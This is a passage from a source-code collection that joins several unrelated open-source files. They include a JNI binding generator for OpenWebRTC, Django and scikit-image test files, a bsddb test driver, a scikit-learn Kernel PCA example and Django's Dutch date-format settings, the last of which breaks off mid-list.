self.subclass = subclass
self.method_name = method_name
self.return_type = return_type
self.java_params = params or []
@property
def name(self):
return '_'.join(prune_empty('Java',
self.package.replace('.', '_'),
self.clazz,
self.subclass,
self.method_name,
))
@property
def params(self):
return ['JNIEnv* env'] + self.java_params
@property
def start(self):
return [self.definition, '{']
@staticmethod
def default(function, body=[], **kwargs):
params = map(jni_param, function.params.java_params)
if function.params.instance_param is None:
params = ['jclass jclazz'] + params
else:
params = [jni_param(function.params.instance_param)] + params
args = {
'return_type': function.params.return_value.jni_type,
'method_name': function.name,
'params': params,
'body': [C.TypeConversions.params_to_c(function.params, body=body, get_env=False)],
}
if function.params.return_value.name is not None:
args['body'] += [C.Return(function.params.return_value.jni_name)]
args.update(kwargs)
return JniExport(**args)
@add_to(C)
class Helper(C.Call):
helper_functions = {}
used_helpers = []
def __init__(self, name, *args):
super(Helper, self).__init__(name, *args)
func = self.helper_functions.pop(name, None)
if func is not None:
self.used_helpers.append(func)
@classmethod
def add_helper(cls, name, func):
cls.helper_functions[name] = func
@classmethod
def enumerate_used_helpers(cls):
return cls.used_helpers
@add_to(C)
class Cache(C.Lines):
cached_classes = defaultdict(partial(defaultdict, dict))
def __init__(self, *args):
self.args = list(args)
def __iter__(self):
yield 'cache_' + flatjoin(self.args, '_')
@classmethod
def clazz(cls, *args):
classname = flatjoin(args, '$')
cls.cached_classes[type_signatures[classname]['_path']]
return cls(*args)
def _make_cacher(func):
@classmethod
def cacher(cls, *args):
methodname = args[-1]
signatures = type_signatures[flatjoin(args[:-1], '$')]
cls.cached_classes[signatures['_path']][func][methodname] = signatures[methodname]
return cls(*args)
return cacher
method = _make_cacher('GetMethodID')
static_method = _make_cacher('GetStaticMethodID')
field = _make_cacher('GetFieldID')
static_field = _make_cacher('GetStaticFieldID')
@classmethod
def default_class(cls, clazz):
cls.cached_classes[clazz.java_class_path]
return cls(clazz.java_type)
@classmethod
def default_method(cls, func):
val = func.value
args = None
if hasattr(val, 'outer_java_type'):
args = [val.outer_java_type, val.java_type, func.name]
else:
args = [val.java_type, func.name]
cls.cached_classes[val.java_class_path]['GetMethodID'][func.name] = func.method_signature
return cls(*args)
@classmethod
def default_enum_member(cls, enum, member):
typ = enum.type
if hasattr(enum.type, 'inner_type'):
typ = enum.type.inner_type
cls.cached_classes[typ.java_class_path]['GetStaticFieldID'][member.name] = typ.java_signature
return cls(enum.name, member.name)
@classmethod
def enumerate_cached_classes(cls):
cache_declarations = []
jni_onload_cache = []
for classpath, clazz in Cache.cached_classes.items():
classname = classpath[classpath.rfind('/')+1:]
to_cache_var = lambda *args: '_'.join(['cache'] + classname.split('$') + list(args))
classvar = to_cache_var()
cache_declarations += [C.Decl('static jclass', classvar)]
jni_onload_cache += [
C.Assign(classvar, C.Env('FindClass', quot(classpath))),
C.ExceptionCheck('0'),
C.Assign(classvar, C.Env('NewGlobalRef', classvar)),
C.ExceptionCheck('0'),
]
for getfunc, method in clazz.items():
var_type = 'jmethodID' if 'Method' in getfunc else 'jfieldID'
for methodname, signature in method.items():
methodvar = to_cache_var(methodname)
if methodname == '_constructor':
methodname = '<init>'
cache_declarations += [C.Decl('static ' + var_type, methodvar)]
jni_onload_cache += [
C.Log('debug', 'getting %s.%s', quot(classname), quot(methodname)),
C.Assign(methodvar, C.Env(getfunc, classvar, quot(methodname), quot(signature))),
C.ExceptionCheck('0'),
]
cache_declarations.append('')
jni_onload_cache.append('')
return cache_declarations[:-1], jni_onload_cache[:-1]
@add_to(C)
class Env(C.Lines):
return_type_table = {
'V': 'Void',
';': 'Object',
'Z': 'Boolean',
'B': 'Byte',
'C': 'Char',
'S': 'Short',
'I': 'Int',
'J': 'Long',
'F': 'Float',
'D': 'Double',
}
def __init__(self, name, *args):
self.name = name
self.args = args
@staticmethod
def tuple_to_type(args):
clazz = type_signatures[flatjoin(args[:-1], '$')]
method = clazz[args[-1]]
return Env.return_type_table[method[-1]]
@classmethod
def method(cls, name, method_tuple, *args):
return cls('Call' + Env.tuple_to_type(method_tuple) + 'Method', name, C.Cache.method(*method_tuple), *args)
@classmethod
def static_method(cls, method_tuple, *args):
return cls('CallStatic' + Env.tuple_to_type(method_tuple) + 'Method', C.Cache.clazz(method_tuple[:-1]), C.Cache.static_method(*method_tuple), *args)
@classmethod
def field(cls, name, field_tuple):
return cls('Get' + Env.tuple_to_type(field_tuple) + 'Field', name, C.Cache.field(*field_tuple))
@classmethod
def new(cls, clazz, *args):
return cls('NewObject', C.Cache.clazz(clazz), C.Cache.method(clazz, '_constructor'), *args)
@classmethod
def throw(cls, clazz, msg):
return cls('ThrowNew', C.Cache.clazz(clazz), msg)
@classmethod
def callback(cls, callback):
type = Env.return_type_table[callback.params.return_value.java_signature[-1]]
cached = None
if hasattr(callback.value, 'outer_java_type'):
cached = (callback.value.outer_java_type, callback.value.java_type, callback.name)
else:
cached = (callback.value.java_type, callback.name)
return cls('Call' + type + 'Method',
map(jni_arg, callback.params.closure_params),
C.Cache.default_method(callback),
*map(jni_arg, callback.params.java_params)
)
def __iter__(self):
yield semi('(*env)->{name}({args})'.format(
name=self.name,
args=flatjoin(['env'] + list(flatten(self.args)), ', '),
))
@add_to(C)
class TypeConversions(C.Lines):
def __init__(self, conversions, return_conversion, body=None, get_env=True, push_frame=False, **kwargs):
super(TypeConversions, self).__init__(**kwargs)
self.conversions = list(conversions)
self.return_conversion = return_conversion
self.body = body or []
self.get_env = get_env
self.push_frame = push_frame
def __iter__(self):
conversion = [
prune_empty([p.declarations for p in self.conversions] + [self.get_env and C.Decl('JNIEnv*', 'env')]),
self.get_env and C.Assign('env', C.Call('get_jni_env')),
C.If(Env('PushLocalFrame', str(config.LOCAL_FRAME_SIZE)),
C.Log('warning', 'failed to push local frame at %s:%d', '__FILE__', '__LINE__')
) if self.push_frame else [],
prune_empty([p.conversion for p in self.conversions]),
self.body,
prune_empty(p.cleanup for p in reversed(self.conversions)),
Env('PopLocalFrame', 'NULL') if self.push_frame else [],
]
if self.return_conversion is not None:
conversion = [self.return_conversion.declarations] + conversion + [
self.return_conversion.conversion, self.return_conversion.cleanup,
]
return iter(intersperse(prune_empty(conversion), ''))
@staticmethod
def params_to_c(params, **kwargs):
ret = params.return_value
return TypeConversions([param.transform_to_c() for param in params],
ret.transform_to_jni() if ret.name is not None else None, **kwargs)
@staticmethod
def params_to_jni(params, **kwargs):
ret = params.return_value
return TypeConversions([param.transform_to_jni() for param in params],
ret.transform_to_c() if ret.name is not None else None, **kwargs)
def make_function_gen(package, classname):
def gen(function):
call = C.Call(function.c_name, map(c_arg, function.params))
ret = function.params.return_value
if ret.name is not None:
call = C.Assign(ret.c_name, call)
out = JniExport.default(function, package=package, clazz=classname, body=call)
if ret.name is not None:
out.body = [C.Decl(ret.c_type, ret.c_name)] + out.body
return out
return gen
def make_callback_gen(package, classname):
def gen(callback):
call = C.Env.callback(callback)
ret = callback.params.return_value
if ret.name is not None:
call = C.Assign(ret.jni_name, call)
out = C.Function.callback(callback, package=package, clazz=classname, body=call)
if ret.name is not None:
out.body = [C.Decl(ret.jni_type, ret.jni_name)] + out.body
return out
return gen
def make_signal_accessors_gen(package, classname):
def gen(signal):
connect_args = map(c_arg, signal.add_listener.params)
connect_args[0] = 'G_OBJECT(' + connect_args[0] + ')'
connect_args.insert(1, quot(signal.signal_name))
connect_args += [C.Helper('jobject_wrapper_closure_notify').name, '0']
ret = signal.add_listener.params.return_value
connecter = C.JniExport.default(signal.add_listener, package=package, clazz=classname,
body=[C.Assign(ret.c_name, C.Call('g_signal_connect_data', connect_args))],
)
connecter.body = [C.Decl(ret.c_type, ret.c_name)] + connecter.body
disconnect_args = map(c_arg, signal.remove_listener.params)
disconnect_args[0] = 'G_OBJECT(' + disconnect_args[0] + ')'
disconnecter = C.JniExport.default(signal.remove_listener, package=package, clazz=classname,
body=C.Call('g_signal_handler_disconnect', disconnect_args),
)
return [connecter, disconnecter]
return gen
def gen_class(package, clazz):
body = [C.CommentHeader(clazz.name)]
gen_signal_accessors = make_signal_accessors_gen(package, clazz.name)
for attr in ['constructors', 'functions', 'methods']:
body += [C.Comment(attr) if getattr(clazz, attr) else None]
body += map(make_function_gen(package, clazz.name), getattr(clazz, attr))
for interface in clazz.interfaces:
body += map(make_function_gen(package, clazz.name), interface.methods)
body += [C.Comment('signals') if clazz.signals else None]
body += map(make_callback_gen(package, clazz.name), clazz.signals)
body += map(gen_signal_accessors, clazz.signals)
body += [C.Comment('properties') if clazz.properties else None]
for prop in clazz.properties:
body += [C.Comment(prop.name)]
if prop.readable:
# getter
ret = prop.getter.params.return_value
get_params = map(c_arg, prop.getter.params) + [quot(prop.name), '&' + ret.c_name, 'NULL']
func = C.JniExport.default(prop.getter, package=package, clazz=clazz.name, body=[
C.Call('g_object_get', get_params),
])
if ret.name is not None:
func.body = [C.Decl(ret.c_type, ret.c_name)] + func.body
body.append(func)
# change listener
transform = ret.transform_to_jni()
func = C.Function(
package=package,
clazz=clazz.name,
name='callback_' + prop.signal.value.gir_type,
return_type=prop.signal.params.return_value.c_type,
params=map(c_param, prop.signal.params),
body=[TypeConversions([p.transform_to_jni() for p in prop.signal.params.params], None, push_frame=True, body=[
'(void) c_pspec;',
C.Call('g_object_get', get_params),
transform.conversion,
C.Env.callback(prop.signal),
transform.cleanup,
])],
)
func.body = [
C.Decl(ret.c_type, ret.c_name),
transform.declarations,
] + func.body
body.append(func)
body += gen_signal_accessors(prop.signal)
if prop.writable:
# setter
ret = prop.setter.params.return_value
params = map(c_arg, prop.setter.params)
params.insert(1, quot(prop.name))
params.append('NULL')
func = C.JniExport.default(prop.setter, package=package, clazz=clazz.name, body=[
C.Call('g_object_set', params)
])
body += [func]
return intersperse(prune_empty(body), '')
def gen_namespace(namespace, package):
body = []
package = package + '.' + namespace.symbol_prefix
body += map(make_callback_gen(package, namespace.identifier_prefix), namespace.callbacks)
body += map(make_function_gen(package, namespace.identifier_prefix), namespace.functions)
body += map(partial(gen_class, package), namespace.classes)
return body
def add_helpers(namespace):
for enum in namespace.enums:
C.Helper.add_helper(enum.name + '_to_java_enum',
C.Function(enum.name + '_to_java_enum',
return_type='jobject',
params=['JNIEnv* env', enum.type.c_type + ' value'],
body=[
C.Decl('jfieldID', 'fieldId'),
C.Decl('jobject', 'result'),
'',
C.Switch('value', cases=[
(member.c_name, C.Assign('fieldId', C.Cache.default_enum_member(enum, member)))
for member in enum.members
]),
'',
C.Assert('fieldId'),
C.Assign('result', Env('GetStaticObjectField', C.Cache(enum.name), 'fieldId')),
C.ExceptionCheck('NULL'),
C.Return('result'),
]
)
)
def gen_source(namespaces, include_headers):
body = []
package = config.PACKAGE_ROOT
for namespace in namespaces:
add_helpers(namespace)
for namespace in namespaces:
body += gen_namespace(namespace, package)
jobject_wrapper_struct = C.Block(
_start = 'typedef union {',
body = [
C.Decl('jobject', 'obj'),
C.Decl('jweak', 'weak'),
],
_end = '} JObjectWrapper;',
)
jobject_callback_wrapper_struct = C.Block(
_start = 'typedef struct {',
body = [
C.Decl('JObjectWrapper', '*wrapper'),
C.Decl('gboolean', 'should_destroy'),
],
_end = '} JObjectCallbackWrapper;',
)
native_destructor = [C.JniExport(
package=package,
clazz='NativeInstance',
method_name='nativeDestructor',
return_type='void',
params=['jclass clazz', 'jlong instance_pointer'],
body=[
C.Decl('GWeakRef*', 'ref'),
C.Decl('GObject*', 'gobj'),
C.Decl('JObjectWrapper*', 'wrapper'),
'(void) clazz;',
'',
C.Assign('ref', 'instance_pointer', cast='GWeakRef*'),
C.Assign('gobj', C.Call('g_weak_ref_get', 'ref')),
C.Call('g_weak_ref_clear', 'ref'),
C.Call('g_free', 'ref'),
'',
C.If('!gobj',
C.Env.throw('IllegalStateException', '"GObject ref was NULL at finalization"'),
C.Return()),
C.Log('debug', 'unrefing GObject[%p]', 'gobj'),
C.Assign('wrapper', C.Call('g_object_get_data', 'gobj', '"java_instance"'), cast='JObjectWrapper*'),
C.If('wrapper', [
C.Call('g_object_set_data', 'gobj', '"java_instance"', 'NULL'),
C.Helper('jobject_wrapper_destroy', 'wrapper', 'TRUE'),
]),
C.Call('g_object_unref', 'gobj'),
]),
]
helper_functions = Helper.enumerate_used_helpers()
gobject_class_cache = [
C.Call('g_hash_table_insert', 'gobject_to_java_class_map', C.Call(clazz.glib_get_type), Cache.default_class(clazz.value))
for namespace in namespaces for clazz in namespace.classes]
# cached classes need to be enumerated last
cache_declarations, jni_onload_cache = C.Cache.enumerate_cached_classes()
jni_onload = Function(
name='JNI_OnLoad',
return_type='jint',
params=['JavaVM* vm', 'void* reserved'],
modifiers=[],
body=[
C.Decl('JNIEnv*', 'env'),
'',
C.Assign('jvm', 'vm'),
C.Assign('env', C.Call('get_jni_env')),
'',
jni_onload_cache,
'',
C.Assign('gobject_to_java_class_map', C.Call('g_hash_table_new', 'g_direct_hash', 'g_direct_equal')),
'',
gobject_class_cache,
'',
C.Return('JNI_VERSION_1_6'),
]
)
include_headers = ['jni.h', 'android/log.h'] + include_headers
includes = '\n'.join('#include <' + h + '>' for h in include_headers)
body = [
includes,
HEADER,
cache_declarations,
C.Decl('static GHashTable*', 'gobject_to_java_class_map'),
GET_JNI_ENV,
jni_onload,
jobject_wrapper_struct,
jobject_callback_wrapper_struct,
] + helper_functions + [native_destructor] + body
body = intersperse(prune_empty(body), '')
return flatjoin(body, '\n')
HEADER = """
#define android_assert(st) if (!(st)) {{ __android_log_write(ANDROID_LOG_ERROR, "OpenWebRTC", "Assertion failed at "G_STRINGIFY(__LINE__));}}
#undef g_assert
#define g_assert android_assert
#define log_verbose(st, ...) __android_log_print(ANDROID_LOG_VERBOSE, "{0}", "["G_STRINGIFY(__LINE__)"]: "st, ##__VA_ARGS__);
#define log_debug(st, ...) __android_log_print(ANDROID_LOG_DEBUG, "{0}", "["G_STRINGIFY(__LINE__)"]: "st, ##__VA_ARGS__);
#define log_info(st, ...) __android_log_print(ANDROID_LOG_INFO, "{0}", "["G_STRINGIFY(__LINE__)"]: "st, ##__VA_ARGS__);
#define log_warning(st, ...) __android_log_print(ANDROID_LOG_WARN, "{0}", "["G_STRINGIFY(__LINE__)"]: "st, ##__VA_ARGS__);
#define log_error(st, ...) __android_log_print(ANDROID_LOG_ERROR, "{0}", "["G_STRINGIFY(__LINE__)"]: "st, ##__VA_ARGS__);
""".format(config.LOG_TAG)
GET_JNI_ENV = [
C.Decl('static JavaVM*', 'jvm'),
C.Decl('static pthread_key_t', 'pthread_detach_key = 0'),
'',
C.Function('detach_current_thread',
params=['void* pthread_key'],
body=[
C.Decl('(void)', 'pthread_key'),
C.Call('g_return_if_fail', 'jvm'),
'',
C.Log.debug('JNI: detaching current thread from Java VM: %ld', C.Call('pthread_self')),
'',
C.Call('(*jvm)->DetachCurrentThread', 'jvm'),
C.Call('pthread_setspecific', 'pthread_detach_key', 'NULL'),
]
),
'',
C.Function('get_jni_env',
return_type='JNIEnv*',
params=[],
body=[
C.Decl('JNIEnv*', 'env'),
C.Decl('int', 'ret'),
'',
C.Assign('env', 'NULL'),
C.Assign('ret', C.Call('(*jvm)->GetEnv', 'jvm', '(void**)&env', 'JNI_VERSION_1_6')),
'',
C.IfElse(ifs=['ret == JNI_EDETACHED', 'ret == JNI_EVERSION'],
bodies=[
C.IfElse(ifs=['(*jvm)->AttachCurrentThread(jvm, (JNIEnv**) &env, NULL) != 0'],
bodies=[
C.Log.error('JNI: failed to attach thread'), [
C.Log.info('JNI: successfully attached to thread'),
C.If(C.Call('pthread_key_create', '&pthread_detach_key', 'detach_current_thread'),
C.Log.error('JNI: failed to set detach callback')),
C.Call('pthread_setspecific', 'pthread_detach_key', 'jvm'),
]
]),
C.Log.error('JNI: version not supported'),
]
),
'',
C.Assert('env'),
C.Return('env'),
]
),
]
|
kirstykitto/CLAtoolkit
|
refs/heads/master
|
clatoolkit_project/clatoolkit/tests.py
|
24123
|
from django.test import TestCase
# Create your tests here.
|
chriscrosscutler/scikit-image
|
refs/heads/master
|
skimage/feature/tests/__init__.py
|
672
|
from ..._shared.testing import setup_test, teardown_test
def setup():
setup_test()
def teardown():
teardown_test()
|
blackzw/openwrt_sdk_dev1
|
refs/heads/master
|
staging_dir/target-mips_r2_uClibc-0.9.33.2/usr/lib/python2.7/test/test_bsddb3.py
|
135
|
# Test driver for bsddb package.
"""
Run all test cases.
"""
import os
import sys
import tempfile
import time
import unittest
from test.test_support import requires, run_unittest, import_module
# Skip test if _bsddb module was not built.
import_module('_bsddb')
# Silence Py3k warning
import_module('bsddb', deprecated=True)
# When running as a script instead of within the regrtest framework, skip the
# requires test, since it's obvious we want to run them.
if __name__ != '__main__':
requires('bsddb')
verbose = False
if 'verbose' in sys.argv:
verbose = True
sys.argv.remove('verbose')
if 'silent' in sys.argv: # take care of old flag, just in case
verbose = False
sys.argv.remove('silent')
class TimingCheck(unittest.TestCase):
"""This class is not a real test. Its purpose is to print a message
periodically when the test runs slowly. This will prevent the buildbots
from timing out on slow machines."""
# How much time in seconds before printing a 'Still working' message.
# Since this is run at most once between each test module, use a smaller
# interval than other tests.
_PRINT_WORKING_MSG_INTERVAL = 4 * 60
# next_time is used as a global variable that survives each instance.
# This is necessary since a new instance will be created for each test.
next_time = time.time() + _PRINT_WORKING_MSG_INTERVAL
def testCheckElapsedTime(self):
# Print still working message since these tests can be really slow.
now = time.time()
if self.next_time <= now:
TimingCheck.next_time = now + self._PRINT_WORKING_MSG_INTERVAL
sys.__stdout__.write(' test_bsddb3 still working, be patient...\n')
sys.__stdout__.flush()
# For invocation through regrtest
def test_main():
from bsddb import db
from bsddb.test import test_all
test_all.set_test_path_prefix(os.path.join(tempfile.gettempdir(),
'z-test_bsddb3-%s' %
os.getpid()))
# Please leave this print in, having this show up in the buildbots
# makes diagnosing problems a lot easier.
print >>sys.stderr, db.DB_VERSION_STRING
print >>sys.stderr, 'Test path prefix: ', test_all.get_test_path_prefix()
try:
run_unittest(test_all.suite(module_prefix='bsddb.test.',
timing_check=TimingCheck))
finally:
# The only reason to remove db_home is in case there is an old
# one lying around. This might be by a different user, so just
# ignore errors. We should always make a unique name now.
try:
test_all.remove_test_path_directory()
except:
pass
if __name__ == '__main__':
test_main()
|
kagayakidan/scikit-learn
|
refs/heads/master
|
examples/decomposition/plot_kernel_pca.py
|
353
|
"""
==========
Kernel PCA
==========
This example shows that Kernel PCA is able to find a projection of the data
that makes data linearly separable.
"""
print(__doc__)
# Authors: Mathieu Blondel
# Andreas Mueller
# License: BSD 3 clause
import numpy as np
import matplotlib.pyplot as plt
from sklearn.decomposition import PCA, KernelPCA
from sklearn.datasets import make_circles
np.random.seed(0)
X, y = make_circles(n_samples=400, factor=.3, noise=.05)
kpca = KernelPCA(kernel="rbf", fit_inverse_transform=True, gamma=10)
X_kpca = kpca.fit_transform(X)
X_back = kpca.inverse_transform(X_kpca)
pca = PCA()
X_pca = pca.fit_transform(X)
# Plot results
plt.figure()
plt.subplot(2, 2, 1, aspect='equal')
plt.title("Original space")
reds = y == 0
blues = y == 1
plt.plot(X[reds, 0], X[reds, 1], "ro")
plt.plot(X[blues, 0], X[blues, 1], "bo")
plt.xlabel("$x_1$")
plt.ylabel("$x_2$")
X1, X2 = np.meshgrid(np.linspace(-1.5, 1.5, 50), np.linspace(-1.5, 1.5, 50))
X_grid = np.array([np.ravel(X1), np.ravel(X2)]).T
# projection on the first principal component (in the phi space)
Z_grid = kpca.transform(X_grid)[:, 0].reshape(X1.shape)
plt.contour(X1, X2, Z_grid, colors='grey', linewidths=1, origin='lower')
plt.subplot(2, 2, 2, aspect='equal')
plt.plot(X_pca[reds, 0], X_pca[reds, 1], "ro")
plt.plot(X_pca[blues, 0], X_pca[blues, 1], "bo")
plt.title("Projection by PCA")
plt.xlabel("1st principal component")
plt.ylabel("2nd component")
plt.subplot(2, 2, 3, aspect='equal')
plt.plot(X_kpca[reds, 0], X_kpca[reds, 1], "ro")
plt.plot(X_kpca[blues, 0], X_kpca[blues, 1], "bo")
plt.title("Projection by KPCA")
plt.xlabel("1st principal component in space induced by $\phi$")
plt.ylabel("2nd component")
plt.subplot(2, 2, 4, aspect='equal')
plt.plot(X_back[reds, 0], X_back[reds, 1], "ro")
plt.plot(X_back[blues, 0], X_back[blues, 1], "bo")
plt.title("Original space after inverse transform")
plt.xlabel("$x_1$")
plt.ylabel("$x_2$")
plt.subplots_adjust(0.02, 0.10, 0.98, 0.94, 0.04, 0.35)
plt.show()
|
olasitarska/django
|
refs/heads/master
|
tests/model_regress/tests.py
|
39
|
from __future__ import unicode_literals
import datetime
from operator import attrgetter
import sys
import unittest
from django.core.exceptions import ValidationError
from django.test import TestCase, skipUnlessDBFeature
from django.utils import six
from django.utils.timezone import get_fixed_timezone
from django.db import connection, router
from django.db.models.sql import InsertQuery
from .models import (Worker, Article, Party, Event, Department,
BrokenUnicodeMethod, NonAutoPK, Model1, Model2, Model3)
class ModelTests(TestCase):
# The bug is that the following queries would raise:
# "TypeError: Related Field has invalid lookup: gte"
def test_related_gte_lookup(self):
"""
Regression test for #10153: foreign key __gte lookups.
"""
Worker.objects.filter(department__gte=0)
def test_related_lte_lookup(self):
"""
Regression test for #10153: foreign key __lte lookups.
"""
Worker.objects.filter(department__lte=0)
def test_sql_insert_compiler_return_id_attribute(self):
"""
Regression test for #14019: SQLInsertCompiler.as_sql() failure
"""
db = router.db_for_write(Party)
query = InsertQuery(Party)
query.insert_values([Party._meta.fields[0]], [], raw=False)
# this line will raise an AttributeError without the accompanying fix
query.get_compiler(using=db).as_sql()
def test_empty_choice(self):
# NOTE: Part of the regression test here is merely parsing the model
# declaration. The verbose_name, in particular, did not always work.
a = Article.objects.create(
headline="Look at me!", pub_date=datetime.datetime.now()
)
# An empty choice field should return None for the display name.
self.assertIs(a.get_status_display(), None)
# Empty strings should be returned as Unicode
a = Article.objects.get(pk=a.pk)
self.assertEqual(a.misc_data, '')
self.assertIs(type(a.misc_data), six.text_type)
def test_long_textfield(self):
# TextFields can hold more than 4000 characters (this was broken in
# Oracle).
a = Article.objects.create(
headline="Really, really big",
pub_date=datetime.datetime.now(),
article_text="ABCDE" * 1000
)
a = Article.objects.get(pk=a.pk)
self.assertEqual(len(a.article_text), 5000)
def test_long_unicode_textfield(self):
# TextFields can hold more than 4000 bytes also when they are
# less than 4000 characters
a = Article.objects.create(
headline="Really, really big",
pub_date=datetime.datetime.now(),
article_text='\u05d0\u05d1\u05d2' * 1000
)
a = Article.objects.get(pk=a.pk)
self.assertEqual(len(a.article_text), 3000)
def test_date_lookup(self):
# Regression test for #659
Party.objects.create(when=datetime.datetime(1999, 12, 31))
Party.objects.create(when=datetime.datetime(1998, 12, 31))
Party.objects.create(when=datetime.datetime(1999, 1, 1))
Party.objects.create(when=datetime.datetime(1, 3, 3))
self.assertQuerysetEqual(
Party.objects.filter(when__month=2), []
)
self.assertQuerysetEqual(
Party.objects.filter(when__month=1), [
datetime.date(1999, 1, 1)
],
attrgetter("when")
)
self.assertQuerysetEqual(
Party.objects.filter(when__month=12), [
datetime.date(1999, 12, 31),
datetime.date(1998, 12, 31),
],
attrgetter("when"),
ordered=False
)
self.assertQuerysetEqual(
Party.objects.filter(when__year=1998), [
datetime.date(1998, 12, 31),
],
attrgetter("when")
)
# Regression test for #8510
self.assertQuerysetEqual(
Party.objects.filter(when__day="31"), [
datetime.date(1999, 12, 31),
datetime.date(1998, 12, 31),
],
attrgetter("when"),
ordered=False
)
self.assertQuerysetEqual(
Party.objects.filter(when__month="12"), [
datetime.date(1999, 12, 31),
datetime.date(1998, 12, 31),
],
attrgetter("when"),
ordered=False
)
self.assertQuerysetEqual(
Party.objects.filter(when__year="1998"), [
datetime.date(1998, 12, 31),
],
attrgetter("when")
)
# Regression test for #18969
self.assertQuerysetEqual(
Party.objects.filter(when__year=1), [
datetime.date(1, 3, 3),
],
attrgetter("when")
)
self.assertQuerysetEqual(
Party.objects.filter(when__year='1'), [
datetime.date(1, 3, 3),
],
attrgetter("when")
)
if (3,) <= sys.version_info < (3, 3) and connection.vendor == 'mysql':
# In Python < 3.3, datetime.strftime raises an exception for years
# below 1000, and existing MySQL DB-API drivers hit this problem.
test_date_lookup = unittest.expectedFailure(test_date_lookup)
def test_date_filter_null(self):
# Date filtering was failing with NULL date values in SQLite
# (regression test for #3501, among other things).
Party.objects.create(when=datetime.datetime(1999, 1, 1))
Party.objects.create()
p = Party.objects.filter(when__month=1)[0]
self.assertEqual(p.when, datetime.date(1999, 1, 1))
self.assertQuerysetEqual(
Party.objects.filter(pk=p.pk).dates("when", "month"), [
1
],
attrgetter("month")
)
def test_get_next_prev_by_field(self):
# Check that get_next_by_FIELD and get_previous_by_FIELD don't crash
# when we have usecs values stored on the database
#
# It crashed after the Field.get_db_prep_* refactor, because on most
# backends DateTimeFields supports usecs, but DateTimeField.to_python
# didn't recognize them. (Note that
# Model._get_next_or_previous_by_FIELD coerces values to strings)
Event.objects.create(when=datetime.datetime(2000, 1, 1, 16, 0, 0))
Event.objects.create(when=datetime.datetime(2000, 1, 1, 6, 1, 1))
Event.objects.create(when=datetime.datetime(2000, 1, 1, 13, 1, 1))
e = Event.objects.create(when=datetime.datetime(2000, 1, 1, 12, 0, 20, 24))
self.assertEqual(
e.get_next_by_when().when, datetime.datetime(2000, 1, 1, 13, 1, 1)
)
self.assertEqual(
e.get_previous_by_when().when, datetime.datetime(2000, 1, 1, 6, 1, 1)
)
def test_primary_key_foreign_key_types(self):
# Check Department and Worker (non-default PK type)
d = Department.objects.create(id=10, name="IT")
w = Worker.objects.create(department=d, name="Full-time")
self.assertEqual(six.text_type(w), "Full-time")
def test_broken_unicode(self):
# Models with broken unicode methods should still have a printable repr
b = BrokenUnicodeMethod.objects.create(name="Jerry")
self.assertEqual(repr(b), "<BrokenUnicodeMethod: [Bad Unicode data]>")
@skipUnlessDBFeature("supports_timezones")
def test_timezones(self):
# Saving and updating with timezone-aware datetime Python objects.
# Regression test for #10443.
# The idea is that all these creations and saving should work without
# crashing. It's not rocket science.
dt1 = datetime.datetime(2008, 8, 31, 16, 20, tzinfo=get_fixed_timezone(600))
dt2 = datetime.datetime(2008, 8, 31, 17, 20, tzinfo=get_fixed_timezone(600))
obj = Article.objects.create(
headline="A headline", pub_date=dt1, article_text="foo"
)
obj.pub_date = dt2
obj.save()
self.assertEqual(
Article.objects.filter(headline="A headline").update(pub_date=dt1),
1
)
def test_chained_fks(self):
"""
Regression for #18432: Chained foreign keys with to_field produce incorrect query
"""
m1 = Model1.objects.create(pkey=1000)
m2 = Model2.objects.create(model1=m1)
m3 = Model3.objects.create(model2=m2)
# this is the actual test for #18432
m3 = Model3.objects.get(model2=1000)
m3.model2
class ModelValidationTest(TestCase):
def test_pk_validation(self):
NonAutoPK.objects.create(name="one")
again = NonAutoPK(name="one")
self.assertRaises(ValidationError, again.validate_unique)
class EvaluateMethodTest(TestCase):
"""
Regression test for #13640: cannot filter by objects with 'evaluate' attr
"""
def test_model_with_evaluate_method(self):
"""
Ensures that you can filter by objects that have an 'evaluate' attr
"""
dept = Department.objects.create(pk=1, name='abc')
dept.evaluate = 'abc'
Worker.objects.filter(department=dept)
|
raajitr/django_hangman
|
refs/heads/master
|
env/lib/python2.7/site-packages/django/conf/locale/nl/formats.py
|
504
|
# -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'j F Y' # '20 januari 2009'
TIME_FORMAT = 'H:i' # '15:23'
DATETIME_FORMAT = 'j F Y H:i' # '20 januari 2009 15:23'
YEAR_MONTH_FORMAT = 'F Y' # 'januari 2009'
MONTH_DAY_FORMAT = 'j F' # '20 januari'
SHORT_DATE_FORMAT = 'j-n-Y' # '20-1-2009'
SHORT_DATETIME_FORMAT = 'j-n-Y H:i' # '20-1-2009 15:23'
FIRST_DAY_OF_WEEK = 1 # Monday (in Dutch 'maandag')
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
DATE_INPUT_FORMATS = [
'%d-%m-%Y', '%d-%m-%y', # '20-01-2009', '20-01-09'
'%d/%m/%Y', '%d/%m/%y', # '20/01/2009', '20/01/09'
# '%d %b %Y', '%d %b %y', # '20 jan 2009', '20 jan 09'
# '%d %B %Y', '%d %B %y', # '20 januari 2009', '20 januari 09'
]
# The ISO formats are kept, with one in the first position
TIME_INPUT_FORMATS = [
'%H:%M:%S', # '15:23:35'
'%H:%M:%S.%f', # '15:23:35.000200'
'%H.%M:%S', # '15.23:35'
'%H.%M:%S.%f', # '15.23:35.000200'
'%H.%M', # '15.23'
'%H:%M', # '15:23'
]
DATETIME_INPUT_FORMATS = [
# With time in %H:%M:%S :
'%d-%m-%Y %H:%M:%S', '%d-%m-%y %H:%M:%S', '%Y-%m-%d %H:%M:%S',
# '20-01-2009 15:23:35', '20-01-09 15:23:35', '2009-01-20 15:23:35'
'%d/%m/%Y %H:%M:%S', '%d/%m/%y %H:%M:%S', '%Y/%m/%d %H:%M:%S',
# '20/01/2009 15:23:35', '20/01/09 15:23:35', '2009/01/20 15:23:35'
# '%d %b %Y %H:%M:%S', '%d %b %y %H:%M:%S', # '20 jan 2009 15:23:35', '20 jan 09 15:23:35'
# '%d %B %Y %H:%M:%S', '%d %B %y %H:%M:%S', # '20 januari 2009 15:23:35', '20 januari 2009 15:23:35'
# With time in %H:%M:%S.%f :
'%d-%m-%Y %H:%M:%S.%f', '%d-%m-%y %H:%M:%S.%f', '%Y-%m-%d %H:%M:%S.%f',
# '20-01-2009 15:23:35.000200', '20-01-09 15:23:35.000200', '2009-01-20 15:23:35.000200'
